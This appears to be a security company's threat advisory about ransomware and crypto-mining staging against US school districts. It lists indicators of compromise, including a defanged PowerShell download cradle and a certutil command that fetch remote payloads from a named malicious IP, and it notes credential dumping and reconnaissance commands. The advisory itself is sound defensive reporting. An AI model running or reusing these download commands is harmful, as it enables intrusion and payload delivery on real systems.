US School District Exploitation Attempts

May 2, 2022 | News

There is recent increased activity targeting school districts across the United States that appear to be staging for ransomware and numerous crypto-mining campaigns targeting critical remote and authentication servers for students.

Related Indicators of Compromise

  • 185.101.107[.]92
  • powershell iex(New-Object Net.WebClient).DownloadString(‘hxxp://185.101.107[.]92/lol.ps1’)
  • “certutil.exe -urlcache -split -f hxxp:///checkit2.exe c:/windows/temp/checkit2.exe”

Summary of Exploitation Attempts

Detections have shown traffic to 185.101.107[.]92, an IP geolocated in Bucharest, Romania, which is flagged as malicious by 16 vendors on VirusTotal and is reported to be associated with crypto mining activity as per AbuseIPDB. Shodan also reports the IP belongs to an ubuntu machine with ports 21, 22, and 80 exposed, which suggests this is maybe a staging point for the threat actors to conceal their actual IP address.

Malicious Java processes spawning PowerShell and cmd prompts executing internal enumeration, privilege escalation, credential theft, and external downloads via PowerShell have been observed.

Starting with a common threat actor tactic known as a download cradle to download post-exploitation and exfiltration tools and loading them straight into memory (evading detection on disk), we are also seeing malicious usage of certutil.exe which is a legitimate Windows executable commonly used to display certification authority configuration information and retrieve certificates. However, it is used maliciously by these threat actors to remotely download a payload as opposed to a certificate.

In this case, an executable may be stored in the temp folder and could easily be overlooked without proper investigation. Detections for lsass dumping (credential theft) were also observed and are typically found when tools like mimikatz or procdump are executed. These tools can be abused to steal credentials for exfiltration and password cracking as well as an escalation of privilege, allowing the threat actor one step closer to domain admin and completing their actions on objectives.

In one school district case, discovery found: whoami, systeminfo, ipconfig, net user, net local admin, net group “domain computers”, and many more reconnaissance commands. In another case, multiple users and a service account with high privilege were identified as having connected to the associated malicious IP.

Recommendations

  • Use Geo-IP and block access to/from Romania if not needed in your environment
  • Create access lists to block 185.101.107.92
  • Review Internet traffic for any Indicators of Compromise

If you would like more information about this topic, please visit our get in touch page and contact us today.

Tags:

Recent Posts

VMware by Broadcom Updates & FAQs

VMware by Broadcom Updates & FAQs

Welcome to our deep-dive into the recent updates on VMware under its new ownership, Broadcom. As most tech enthusiasts are aware of, the VMware by Broadcom acquisition in late 2023 ushered in a new era of significant transformations. In today's post, we present a...

Mitigating Technology Risks in Your Organization

Mitigating Technology Risks in Your Organization

Understanding and mitigating technology risks in your organization is crucial for avoiding unnecessary exposure and enhancing your security posture. Being proactive rather than reactive in identifying and addressing these risks can save your organization from...

Is Microsoft Copilot for M365 Right for Your Business?

Is Microsoft Copilot for M365 Right for Your Business?

There’s been a lot of buzz around the highly anticipated limited launch of Copilot for M365 by Microsoft. People are talking, and understandably so. It's got everyone excited and curious, but it's also raised some valid security questions. Let's dive in and explore...

Why Invest in Physical Security Technology?

Why Invest in Physical Security Technology?

In an increasingly digital world, it's easy to overlook the importance of physical security. However, the safety of physical assets, whether it's your office building or equipment, remains a crucial aspect of overall business security. So, continue reading to learn...

We're Here to Help

Curious about our services? Need to chat with support?

High Point Networks happy team members